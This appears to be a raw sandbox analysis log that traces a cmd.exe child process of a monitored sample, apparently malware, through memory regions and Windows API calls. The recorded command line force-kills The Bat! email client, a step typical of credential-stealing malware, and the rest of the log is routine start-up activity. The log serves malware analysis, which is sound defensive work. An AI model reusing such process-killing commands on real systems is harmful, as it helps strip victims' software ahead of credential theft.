"\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5376 start_va = 0x45f0000 end_va = 0x45f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Thread: id = 376 os_tid = 0x7e8 Thread: id = 377 os_tid = 0x81c Thread: id = 378 os_tid = 0xa88 Thread: id = 379 os_tid = 0xc80 Thread: id = 380 os_tid = 0x13d4 Thread: id = 381 os_tid = 0xad8 Process: id = "75" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2e68d000" os_pid = "0xdf0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im thebat.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5378 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5379 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5380 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5381 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5382 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5383 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5384 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5385 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5386 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5387 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5388 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5389 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5390 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5391 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5392 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5393 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5394 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5395 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5396 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 5397 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5398 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5399 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5400 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5401 start_va = 0x4f0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5402 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5403 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5404 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5405 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5406 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5407 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5408 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 5409 start_va = 0x530000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 5410 start_va = 0x6b0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 5411 start_va = 0x7b0000 end_va = 0x94ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5412 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5413 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5414 start_va = 0x950000 end_va = 0xc86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 382 os_tid = 0xe38 [0222.523] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0222.523] __set_app_type (_Type=0x1) [0222.523] __p__fmode () returned 0x74974d6c [0222.523] __p__commode () returned 0x74975b1c [0222.524] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0222.524] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0222.524] GetCurrentThreadId () returned 0xe38 [0222.524] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe38) returned 0x78 [0222.524] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0222.524] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0222.524] SetThreadUILanguage (LangId=0x0) returned 0x409 [0222.532] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0222.532] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0222.532] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0222.532] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0222.532] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0222.532] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0222.532] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0222.532] GetConsoleOutputCP () returned 0x1b5 [0222.533] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0222.533] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0222.533] _get_osfhandle (_FileHandle=1) returned 0x140 [0222.533] SetConsoleMode (hConsoleHandle=0x140, dwMode=0x0) returned 0 [0222.533] _get_osfhandle (_FileHandle=1) returned 0x140 [0222.533] GetConsoleMode (in: hConsoleHandle=0x140, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0222.533] _get_osfhandle (_FileHandle=0) returned 0x13c [0222.533] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0222.534] GetEnvironmentStringsW () returned 0x6b7cc0* [0222.534] GetProcessHeap () returned 0x6b0000 [0222.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa1a) returned 0x6b86e8 [0222.534] FreeEnvironmentStringsA (penv="A") returned 1 [0222.534] GetProcessHeap () returned 0x6b0000 [0222.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4) returned 0x6b0550 [0222.534] GetEnvironmentStringsW () returned 0x6b7cc0* [0222.534] GetProcessHeap () returned 0x6b0000 [0222.534] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa1a) returned 0x6b9110 [0222.535] FreeEnvironmentStringsA (penv="A") returned 1 [0222.535] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.535] RegCloseKey (hKey=0x88) returned 0x0 [0222.535] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.535] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.536] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0222.536] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0222.536] RegCloseKey (hKey=0x88) returned 0x0 [0222.536] time (in: timer=0x0 | out: timer=0x0) returned 0x6234424d [0222.536] srand (_Seed=0x6234424d) [0222.536] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thebat.exe \"" [0222.536] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im thebat.exe \"" [0222.536] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0222.536] GetProcessHeap () returned 0x6b0000 [0222.536] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x210) returned 0x6b9b38 [0222.536] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6b9b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0222.536] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0222.536] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0222.536] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0222.536] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0222.537] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0222.537] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0222.537] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0222.537] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0222.537] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0222.537] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0222.537] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0222.539] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0222.539] GetProcessHeap () returned 0x6b0000 [0222.540] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b86e8) returned 1 [0222.540] GetEnvironmentStringsW () returned 0x6b7cc0* [0222.540] GetProcessHeap () returned 0x6b0000 [0222.540] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa32) returned 0x6ba790 [0222.540] FreeEnvironmentStringsA (penv="A") returned 1 [0222.540] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0222.540] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0222.540] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0222.540] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0222.540] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0222.540] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0222.540] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0222.540] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0222.540] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0222.540] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0222.540] GetProcessHeap () returned 0x6b0000 [0222.541] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x44) returned 0x6b05c8 [0222.541] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0222.541] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0222.541] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0222.541] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x6b0618 [0222.541] FindClose (in: hFindFile=0x6b0618 | out: hFindFile=0x6b0618) returned 1 [0222.541] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x6b0618 [0222.542] FindClose (in: hFindFile=0x6b0618 | out: hFindFile=0x6b0618) returned 1 [0222.542] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0222.542] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x6b0618 [0222.542] FindClose (in: hFindFile=0x6b0618 | out: hFindFile=0x6b0618) returned 1 [0222.542] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0222.542] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0222.542] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0222.542] GetProcessHeap () returned 0x6b0000 [0222.543] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6ba790) returned 1 [0222.543] GetEnvironmentStringsW () returned 0x6b7cc0* [0222.543] GetProcessHeap () returned 0x6b0000 [0222.543] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xa76) returned 0x6b9d50 [0222.543] FreeEnvironmentStringsA (penv="=") returned 1 [0222.543] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0222.543] GetProcessHeap () returned 0x6b0000 [0222.543] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6b05c8) returned 1 [0222.544] GetProcessHeap () returned 0x6b0000 [0222.544] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x400e) returned 0x6bbc50 [0222.544] GetProcessHeap () returned 0x6b0000 [0222.544] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x48) returned 0x6ba7d0 [0222.544] GetProcessHeap () returned 0x6b0000 [0222.544] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4008) returned 0x6bfc68 [0222.545] GetProcessHeap () returned 0x6b0000 [0222.545] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x4008) returned 0x6c3c78 [0222.546] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0222.546] GetProcessHeap () returned 0x6b0000 [0222.546] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x418) returned 0x6ba820 [0222.546] SetErrorMode (uMode=0x0) returned 0x8003 [0222.546] SetErrorMode (uMode=0x1) returned 0x0 [0222.547] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x6ba828, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0222.547] SetErrorMode (uMode=0x8003) returned 0x1 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6ba820, Size=0x7a) returned 0x6ba820 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6ba820) returned 0x7a [0222.547] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0x62) returned 0x6ba8a8 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xb8) returned 0x6ba918 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6ba918, Size=0x62) returned 0x6ba918 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6ba918) returned 0x62 [0222.547] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0222.547] GetProcessHeap () returned 0x6b0000 [0222.547] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x8, Size=0xe0) returned 0x6ba988 [0222.551] GetProcessHeap () returned 0x6b0000 [0222.552] RtlReAllocateHeap (Heap=0x6b0000, Flags=0x0, Ptr=0x6ba988, Size=0x76) returned 0x6ba988 [0222.552] GetProcessHeap () returned 0x6b0000 [0222.552] RtlSizeHeap (HeapHandle=0x6b0000, Flags=0x0, MemoryPointer=0x6ba988) returned 0x76 [0222.552] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0222.552] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im thebat.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0222.552] GetLastError () returned 0x3 [0222.552] GetProcessHeap () returned 0x6b0000 [0222.553] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bfc68) returned 1 [0222.553] GetProcessHeap () returned 0x6b0000 [0222.554] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6c3c78) returned 1 [0222.555] GetProcessHeap () returned 0x6b0000 [0222.556] RtlFreeHeap (HeapHandle=0x6b0000, Flags=0x0, BaseAddress=0x6bbc50) returned 1 [0222.556] GetConsoleOutputCP () returned 0x1b5 [0222.556] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0222.556] GetUserDefaultLCID () returned 0x409 [0222.557] GetLocaleInfoW (in: Locale=0x409, 